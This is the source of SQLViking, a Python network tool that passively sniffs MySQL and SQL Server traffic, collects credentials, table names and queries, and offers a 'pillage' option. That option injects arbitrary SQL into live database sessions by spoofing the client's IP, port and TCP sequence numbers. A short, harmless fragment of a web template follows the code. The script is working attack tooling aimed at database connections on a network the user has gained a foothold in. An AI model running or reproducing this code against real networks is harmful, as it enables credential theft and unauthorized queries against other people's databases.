-------------------------------------------------------------------------------- /sqlviking.py: -------------------------------------------------------------------------------- 1 | from os import walk 2 | from operator import itemgetter 3 | from scapy.all import * 4 | from copy import deepcopy 5 | from json import dumps 6 | import sys, getopt, re, argparse, threading, datetime, signal, Queue 7 | sys.path.append("databases/") 8 | from constantvalues import * 9 | #import constantvalues 10 | import mysql,sqlserver,Queue 11 | 12 | dbQueue1 = Queue.Queue() 13 | dbQueue2 = Queue.Queue() 14 | injectionQueue = Queue.Queue() 15 | pktQueue = Queue.Queue() 16 | 17 | settings = {} 18 | DATABASELIST = {'MYSQL':mysql.MySqlDB(), 'SQLSERV':sqlserver.SqlServerDB()} 19 | 20 | class Conn(): 21 | def __init__(self,cip,cport,sip,sport,state,db,nextcseq=-1,nextsseq=-1): 22 | self.cip = cip # client ip 23 | self.cport = cport 24 | self.sip = sip # server ip 25 | self.sport = sport 26 | self.db = db 27 | self.frag = [] 28 | self.state = state 29 | self.nextcseq = nextcseq 30 | self.nextsseq = nextsseq 31 | self.currentUser = '' 32 | self.currentInstance = '' 33 | 34 | def storeTraffic(self,data,pktType): 35 | if pktType==RESPONSE and len(self.db.traffic) > 0 and self.db.traffic[-1].result == None: #is result 36 | self.db.traffic[-1].result = data 37 | elif pktType==RESPONSE: #is result, missed query 38 | self.db.traffic.append(Traffic(result=data)) 39 | else: #is query 40 | self.db.traffic.append(Traffic(query=data)) 41 | 42 | def setInstance(self,instName): 43 | if instName not in self.db.instances: 44 | self.db.instances[instName] = Instance(instName) 45 | self.currentInstance = self.db.instances[instName] 46 | 47 | def foundTable(self,tableName): 48 | self.currentInstance.addTable(tableName) 49 | 50 | def foundCol(self,tableName,colName): 51 | self.db.currentInstance.addColumn(tableName,colName) 52 | 53 | def foundUser(self,user): 54 | self.db.addCredentials(user=user) 55 | 56 | def foundPassword(self,user,pw,salt='',scheme=''): 57 | self.db.addCredentials(user,pw,salt,scheme) 58 | 59 | class Database(): 60 | def __init__(self,dbType,ip,port): 61 | self.ip = ip 62 | self.port = port 63 | self.dbType = dbType 64 | self.traffic = [] 65 | self.credentials = {} # {'username':['pw','salt','scheme']} 66 | self.instances = {} 67 | 68 | def addCredentials(self,user,pw='',salt='',scheme=''): 69 | if user not in self.credentials: 70 | self.credentials[user] = [pw,salt,scheme] 71 | 72 | def getTraffic(self): 73 | data = { 74 | 'type' : None, 75 | 'ip' : None, 76 | 'port' : None, 77 | 'credentials' : [], 78 | 'instances' : [], 79 | 'traffic' : [] 80 | } 81 | traffic = { 82 | 'timestamp' : None, 83 | 'request' : None, 84 | 'response' : None 85 | } 86 | 87 | data['type'] = self.dbType 88 | data['ip'] = self.ip 89 | data['port'] = self.port 90 | data['credentials'] = self.credentials 91 | data['instances'] = deepcopy(self.instances) 92 | data['traffic'] = deepcopy(self.traffic) 93 | 94 | return data 95 | 96 | class Instance(): 97 | def __init__(self,name,tables={}): 98 | self.name = name 99 | self.tables = {} 100 | 101 | def addTable(self,tableName): 102 | if tableName not in self.tables: 103 | self.tables[tableName] = Table(tableName) 104 | 105 | def addColumn(self,tableName,colName): 106 | self.tables[tableName].addColumn(colName) 107 | 108 | class Table(): 109 | def __init__(self,name,cols=[]): 110 | self.name = name 111 | self.columns = cols 112 | 113 | def addColumn(self,colName): 114 | if colName not in self.columnss: 
115 | self.columns.append(colName) 116 | 117 | class Traffic(): 118 | def __init__(self,query=None,result=None,instance=None): 119 | self.query = query 120 | self.result = result 121 | self.timestamp = datetime.datetime.now() 122 | self.instance = instance 123 | 124 | class Scout(threading.Thread): 125 | def __init__(self,interface="eth0"): 126 | threading.Thread.__init__(self) 127 | self.knownDatabases = [] 128 | self.die = False 129 | self.interface = interface 130 | 131 | def run(self): 132 | lfilter = lambda (r): TCP in r 133 | while not self.die: 134 | while not dbQueue2.empty(): 135 | self.knownDatabases.append(dbQueue2.get()) 136 | try: 137 | sniff(prn=pktQueue.put,filter="tcp",store=0,timeout=5,iface=self.interface) 138 | #sniff(prn=self.putPkt,filter="tcp",store=0,timeout=5,iface=self.interface) 139 | except: 140 | print sys.exc_info()[1] 141 | self.die = True 142 | 143 | #for debugging, offloaded logic into Parse.getConn() func to keep from bogging down this thread 144 | #def putPkt(self,pkt): 145 | # for db in self.knownDatabases: 146 | # if (pkt[IP].src == db.ip and pkt[TCP].sport == db.sport) or (pkt[IP].dst == db.ip and pkt[TCP].dport == db.port): 147 | # pktQueue.put(pkt) 148 | 149 | class Parse(threading.Thread): 150 | def __init__(self,interface="eth0",debug=False): 151 | threading.Thread.__init__(self) 152 | self.die = False 153 | self.toInject = [] 154 | self.knownDatabases = [] 155 | self.knownConns = [] 156 | self.fingerprint = False 157 | self.interface = interface 158 | self.debug = debug 159 | 160 | def getNumQueries(self): 161 | l = 0 162 | for db in self.knownDatabases: 163 | l += len(db.traffic) 164 | return l 165 | 166 | def getNumConns(self): 167 | return len(self.knownConns) 168 | 169 | def getNumDBs(self): 170 | return len(self.knownDatabases) 171 | 172 | def dprint(self,s): 173 | if self.debug == 'True': 174 | print(s) 175 | 176 | def dumpResults(self): 177 | data = [] 178 | for db in self.knownDatabases: 179 | data.append(db.getTraffic()) 180 | return data 181 | 182 | def run(self): 183 | global dbQueue1,injectionQueue,pktQueue 184 | while not self.die: 185 | while not dbQueue1.empty(): 186 | self.knownDatabases.append(dbQueue1.get()) 187 | while not injectionQueue.empty(): 188 | self.toInject.append(injectionQueue.get()) 189 | if not pktQueue.empty(): 190 | self.handle(pktQueue.get()) 191 | #for db in self.knownDatabases: 192 | # print db.getTraffic(HUMAN) 193 | 194 | def getConn(self,pkt): 195 | for c in self.knownConns: 196 | if pkt[IP].src == c.cip and pkt[IP].dst == c.sip and pkt[TCP].sport == c.cport and pkt[TCP].dport == c.sport: #is req 197 | return c 198 | elif pkt[IP].src == c.sip and pkt[IP].dst == c.cip and pkt[TCP].sport == c.sport and pkt[TCP].dport == c.cport: #is resp 199 | return c 200 | 201 | for db in self.knownDatabases: 202 | if pkt[IP].src == db.ip and pkt[TCP].sport == db.port: #new resp 203 | c = Conn(cip=pkt[IP].dst,cport=pkt[TCP].dport,sip=db.ip,sport=db.port,state=None,db=db) 204 | self.knownConns.append(c) 205 | return c 206 | elif pkt[IP].dst == db.ip and pkt[TCP].dport == db.port: #new req 207 | c = Conn(cip=pkt[IP].src,cport=pkt[TCP].sport,sip=db.ip,sport=db.port,state=None,db=db) 208 | self.knownConns.append(c) 209 | return c 210 | 211 | if self.fingerprint: 212 | return #todo 213 | 214 | def parse(self,conn): 215 | payload = '' 216 | for p in conn.frag: 217 | payload += str(p[TCP].payload) 218 | 219 | if conn.frag[0][IP].src == conn.sip and conn.frag[0][TCP].sport == conn.sport: #is response 220 | 
conn.storeTraffic(DATABASELIST[conn.db.dbType].parseResp(payload,conn),RESPONSE) 221 | else: #is request 222 | conn.storeTraffic(DATABASELIST[conn.db.dbType].parseReq(payload,conn),REQUEST) 223 | 224 | conn.frag = [] 225 | 226 | def handle(self,pkt): 227 | #even with TCP filter set on scapy, will occassionally get packets 228 | #with no TCP layer (or maybe an empty TCP layer?). throws exception and breaks thread. 229 | pkts = [] 230 | try: 231 | pkt[TCP] 232 | except: 233 | return 234 | 235 | c = self.getConn(pkt) 236 | if c is None: 237 | return 238 | 239 | if pkt[TCP].flags == 24: #don't inject after fragged pkt, we'll lose that race 240 | for i in self.toInject: 241 | #self.printLn("[1] %s %s %s %s %s %s"%(c.db.ip,i[1],c.db.port,i[2],pkt[TCP].sport,pkt[TCP].flags)) 242 | if c.db.ip == i[1] and c.db.port == i[2] and pkt[TCP].sport == i[2]: #make sure to inject after db response to increase likelihood of success 243 | #self.printLn("[2] attempting injection") 244 | #self.printLn(databaseList[c.db.dbType].encodeQuery(i[0]).encode('hex')) 245 | #sendp(Ether(dst=pkt[Ether].src,src=pkt[Ether].dst)/IP(dst=i[1],src=c.cip)/TCP(sport=c.cport,dport=i[2],flags=16,seq=c.nextcseq,ack=pkt[TCP].seq+len(pkt[TCP].payload))) 246 | sendp(Ether(dst=pkt[Ether].src,src=pkt[Ether].dst)/IP(dst=i[1],src=c.cip)/TCP(sport=c.cport,dport=i[2],flags=24,seq=c.nextcseq,ack=pkt[TCP].seq+len(pkt[TCP].payload))/DATABASELIST[c.db.dbType].encodeQuery(i[0]),iface=self.interface) 247 | self.toInject.remove(i) 248 | 249 | #check for TCP control packets 250 | if pkt[TCP].flags == 17: #FIN/ACK pkt 251 | self.knownConns.remove(c) 252 | return 253 | elif pkt[TCP].flags == 2: #SYN pkt 254 | c.nextcseq = pkt[TCP].seq+1 255 | c.state = HANDSHAKE 256 | return 257 | 258 | #TODO: invesitgate this further; are these ACK pkts? 259 | #empty pkt, no reason to parse. scapy sometimes returns empty pkts with [tcp].payload of several '0' values 260 | if len(pkt[TCP].payload) == 0 or (len(pkt[TCP].payload) <= 16 and str(pkt[TCP].payload).encode('hex') == '00'*len(pkt[TCP].payload)): 261 | return 262 | 263 | # this destroys any kind of out-of-order fault tolerance. need to rethink. 264 | #if pkt[IP].src == c.cip and pkt[TCP].sport == c.cport and c.nextcseq != -1 and c.nextcseq != pkt[TCP].seq: #is a bad req 265 | # return 266 | #elif pkt[IP].dst == c.cip and pkt[TCP].dport == c.cport and c.nextsseq != -1 and c.nextsseq != pkt[TCP].seq: #is a bad resp 267 | # return 268 | 269 | c.frag.append(pkt) 270 | if (pkt[TCP].flags >> 3) % 2 == 0: 271 | return 272 | self.parse(c) 273 | 274 | if pkt[IP].src == c.cip and pkt[TCP].sport == c.cport: 275 | c.nextcseq = len(pkt[TCP].payload)+pkt[TCP].seq 276 | else: 277 | c.nextsseq = len(pkt[TCP].payload)+pkt[TCP].seq 278 | 279 | def dprint(s): 280 | global settings 281 | if settings['debug']: 282 | print(s) 283 | 284 | def parseConfig(f): 285 | settings = {} 286 | 287 | with open(f,'r') as f: 288 | for line in f: 289 | line = line.split('#')[0].strip() 290 | if len(line) == 0: 291 | # Skip empty lines 292 | continue 293 | 294 | # Check if new settings section began 295 | section_match = re.match("^\[[^\[\]]*\]$", line) 296 | if section_match: 297 | current_section = section_match.string 298 | continue 299 | 300 | if current_section == "[Databases]": 301 | try: 302 | db_type, ip, port = line.split(':') 303 | except: 304 | print("Check correctness of the settings file. " 305 | "Couldn't parse the follwing line:\n{}".format( 306 | line)) 307 | sys.exit(1) 308 | #dprint('[?] 
Parsing line for db info:\t%s'%l) 309 | dbQueue1.put(Database( 310 | db_type, 311 | ip.strip(), 312 | int(port) 313 | )) 314 | dbQueue2.put(Database( 315 | db_type, 316 | ip, 317 | port 318 | )) 319 | elif current_section == "[Injection]": 320 | injectionQueue.put(line) 321 | elif current_section == "[Data]" or current_section == "[Misc]": 322 | try: 323 | key, value = line.split('=') 324 | except: 325 | print("Check correctness of the settings file. " 326 | "Couldn't parse the follwing line:\n{}".format( 327 | line)) 328 | sys.exit(1) 329 | 330 | settings[key.strip()] = value.strip() 331 | 332 | return settings 333 | 334 | 335 | def isValidIP(ip): 336 | if len(ip.split('.')) != 4: 337 | return False 338 | for oct in ip.split('.'): 339 | try: 340 | if int(oct) < 0 or int(oct) > 256: 341 | return False 342 | except ValueError: 343 | return False 344 | return True 345 | 346 | def isValidPort(port): 347 | try: 348 | if int(port) < 0 or int(port) > 65565: 349 | return False 350 | except ValueError: 351 | return False 352 | return True 353 | 354 | def isValidDbType(dbType): 355 | if dbType in DATABASELIST: 356 | return True 357 | else: 358 | return False 359 | 360 | def writeResults(t): 361 | global settings 362 | print('[*] Enter filepath to write to:') 363 | path = raw_input("> ") 364 | data = formatData(t.dumpResults(), settings['format']) 365 | with open(path,'w') as f: 366 | f.write(data) 367 | try: 368 | print('[*] Data saved to: %s'%path) 369 | except: 370 | print('[!] Unable to save to file: %s'%path) 371 | print('Error: %s'%sys.exc_info()[0]) 372 | time.sleep(5) 373 | printMainMenu(t) 374 | 375 | def formatData(rawData,format): 376 | data = '' 377 | if format.upper() == 'HUMAN': 378 | for db in rawData: 379 | data += '\n%s%s@%s:%s%s\n\n'%('-'*20,db['type'],db['ip'],db['port'],'-'*20) 380 | data += 'Credentials:\n' 381 | if len(db['credentials']) > 0: 382 | for u,p in db['credentials'].iteritems(): 383 | data += '\t%s : %s\n'%(u,p) 384 | else: 385 | data += 'No credentials harvested\n' 386 | 387 | data += '\nInstances:\n' 388 | if len(db['instances']) > 0: 389 | for instanceName,instance in db['instances'].iteritems(): 390 | data += '%s\n'%instanceName 391 | for tableName,table in instance.tables.iteritems(): 392 | data += '\t%s:\t%s\n'%(tableName, ', '.join(table.columns)) 393 | else: 394 | data += 'No instances identified\n' 395 | 396 | data += '\nTraffic:\n' 397 | for t in db['traffic']: 398 | data += '\n--Timestamp--\n%s\n'%t.timestamp 399 | data += '--Request--\n' 400 | if t.query: 401 | for q in t.query: 402 | data += '%s\n'%q 403 | else: 404 | data += 'None\n' 405 | data += '--Response--\n' 406 | if t.result: 407 | for r in t.result: 408 | data += '%s\n'%r 409 | else: 410 | data += 'None\n' 411 | elif format.upper() == 'JSON': 412 | for db in rawData: 413 | for i in range(len(db['traffic'])): 414 | db['traffic'][i] = vars(db['traffic'][i]) 415 | for i in range(len(db['instances'])): 416 | for k,v in db['instances'][i].iteritems(): 417 | db['instances'][i][k] = vars(v) 418 | print('data: %s'%rawData) 419 | data = dumps(rawData) 420 | return data 421 | 422 | def addDb(t): 423 | ip = '' 424 | port = '' 425 | dbtype = '' 426 | 427 | while(not isValidIP(ip)): 428 | print('[*] Enter IP of DB') 429 | ip = raw_input('> ') 430 | while(not isValidPort(port)): 431 | print('[*] Enter port of DB') 432 | port = raw_input('> ') 433 | while(not isValidDbType(dbtype)): 434 | print('[*] Enter type of DB') 435 | dbtype = raw_input('> ').upper() 436 | 437 | 
dbQueue1.put(Database(ip=ip,port=port,dbType=dbtype)) 438 | 439 | def pillage(): 440 | global queries 441 | print('[*] Enter query to execute:') 442 | query = raw_input("> ") 443 | print('[*] Enter IP to execute against:') 444 | ip = raw_input("> ") 445 | print('[*] Enter port to execute against:') 446 | port = raw_input("> ") 447 | print('[*] Run "%s" against %s:%s? [y/n]'%(query,ip,port)) 448 | ans = raw_input("> ") 449 | if ans.lower() == 'y': 450 | injectionQueue.put([query,ip,int(port)]) 451 | print('[*] Query will run as soon as possible') 452 | else: 453 | print('[*] Cancelling...') 454 | time.sleep(1) 455 | 456 | def parseInput(input,t): 457 | if input == 'w': 458 | writeResults(t) 459 | elif input == 'r': 460 | pillage() 461 | elif input == 'a': 462 | addDb(t) 463 | elif input == 'q': 464 | raise KeyboardInterrupt 465 | else: 466 | print('Unknown command entered') 467 | 468 | def wipeScreen(): 469 | y,x = os.popen('stty size', 'r').read().split() 470 | print('\033[1;1H') 471 | for i in range(0,int(y)): 472 | print(' '*int(x)) 473 | print('\033[1;1H') 474 | 475 | class AlarmException(Exception): 476 | pass 477 | 478 | def alarmHandler(signum, frame): 479 | raise AlarmException 480 | 481 | def nonBlockingRawInput(t, prompt='> ', timeout=5): 482 | signal.signal(signal.SIGALRM, alarmHandler) 483 | signal.alarm(timeout) 484 | try: 485 | text = raw_input(prompt) 486 | signal.alarm(0) 487 | parseInput(text,t) 488 | except AlarmException: 489 | printMainMenu(t) 490 | signal.signal(signal.SIGALRM,signal.SIG_IGN) 491 | 492 | def printMainMenu(t,wipe=True): 493 | if wipe: 494 | wipeScreen() 495 | y,x = os.popen('stty size', 'r').read().split() 496 | 497 | print('{{:^{}}}'.format(x).format('===SQLViking===')) 498 | print('\n[*] Current number of known DBs:\t\t%s'%t.getNumDBs()) 499 | print('[*] Current number of known connections:\t%s'%t.getNumConns()) 500 | print('[*] Current number of queries capured:\t\t%s'%t.getNumQueries()) 501 | print('\n[*] Menu Items:') 502 | print('\tw - dump current results to file specified') 503 | print('\ta - add new DB to track') 504 | print('\tr - run a query against a specified DB') 505 | print('\tq - quit') 506 | 507 | def main(): 508 | global settings 509 | 510 | parser = argparse.ArgumentParser(description='Own the network, own the database', prog='sqlviking.py', usage='%(prog)s [-v] -c ', formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=65, width =150)) 511 | parser.add_argument('-v', '--verbose', action='store_true', help='Turn on verbose mode; will print out all captured traffic') 512 | parser.add_argument('-c', '--configfile', default='sqlviking.conf', help='Config file location, defaults to sqlviking.conf') 513 | args = parser.parse_args() 514 | 515 | try: 516 | settings = parseConfig(args.configfile) 517 | except IOError: 518 | print('[!] Error reading config file. Exiting...') 519 | sys.exit(0) 520 | 521 | t1 = Scout(settings['interface']) 522 | t2 = Parse(interface=settings['interface'],debug=settings['debug']) 523 | t1.start() 524 | t2.start() 525 | 526 | #printMainMenu(t2) 527 | #while True: 528 | # nonBlockingRawInput(t2) 529 | 530 | try: 531 | printMainMenu(t2) 532 | while True: 533 | nonBlockingRawInput(t2) 534 | except KeyboardInterrupt: 535 | print('\n[!] 
Shutting down...') 536 | t1.die = True 537 | t2.die = True 538 | except: 539 | t1.die = True 540 | t2.die = True 541 | #print sys.exc_info()[1] 542 | for e in sys.exc_info(): 543 | print e 544 | 545 | if __name__ == "__main__": 546 | main() 547 | --------------------------------------------------------------------------------
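Pillage's injection path in `Parse.handle()` rides an existing client connection: right after the server sends a PSH/ACK response (flags == 24), it spoofs a PSH/ACK that appears to come from the real client, using the tracked `nextcseq` as the sequence number, acknowledging everything the server just sent, and carrying the encoded query as the payload. Here is a minimal standalone sketch of that framing, assuming scapy and a captured server response packet (the helper name `inject_query` and its argument list are illustrative, not part of the repo):

```python
from scapy.all import Ether, IP, TCP, sendp

def inject_query(server_pkt, client_ip, client_port, next_client_seq,
                 encoded_query, iface):
    # ACK the bytes the server just pushed so the spoofed segment looks like
    # the client's next in-sequence packet on this connection.
    ack = server_pkt[TCP].seq + len(server_pkt[TCP].payload)
    spoofed = (Ether(dst=server_pkt[Ether].src, src=server_pkt[Ether].dst) /
               IP(src=client_ip, dst=server_pkt[IP].src) /
               TCP(sport=client_port, dport=server_pkt[TCP].sport,
                   flags='PA',                 # PSH/ACK, i.e. flags == 24
                   seq=next_client_seq,
                   ack=ack) /
               encoded_query)                  # e.g. MySqlDB.encodeQuery(...)
    sendp(spoofed, iface=iface)
```

Timing matters here: injecting immediately after a server response means the real client is usually quiet, so the spoofed segment has the best chance of winning the race for the expected sequence number, which is also why `handle()` refuses to inject after fragmented packets.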
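The interactive menu stays responsive the same way `nonBlockingRawInput()` does: it arms `SIGALRM` before calling the blocking `raw_input()`, so the prompt gives up after a few seconds and the main loop can redraw the stats screen. A condensed, self-contained sketch of that pattern (POSIX-only; the helper name `poll_input` is illustrative, and returning `None` on timeout stands in for the menu redraw):

```python
import signal

class AlarmException(Exception):
    pass

def _alarm(signum, frame):
    raise AlarmException

def poll_input(prompt='> ', timeout=5):
    signal.signal(signal.SIGALRM, _alarm)   # install handler (POSIX only)
    signal.alarm(timeout)                   # schedule SIGALRM in `timeout` seconds
    try:
        text = raw_input(prompt)            # blocks until input or SIGALRM fires
        signal.alarm(0)                     # got input: cancel the pending alarm
        return text
    except AlarmException:
        return None                         # timed out: no input this cycle
    finally:
        signal.signal(signal.SIGALRM, signal.SIG_IGN)
```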
[Residue, apparently from /demo/sinatra-app/views/index.erb with its HTML table markup stripped during extraction: the view renders a comments table with "Name" and "Message" column headers, emitting <%= comment.name %> and <%= comment.message.gsub("\n", ...) %> for each comment; the gsub replacement string (stripped HTML, most likely a line-break tag) was lost.]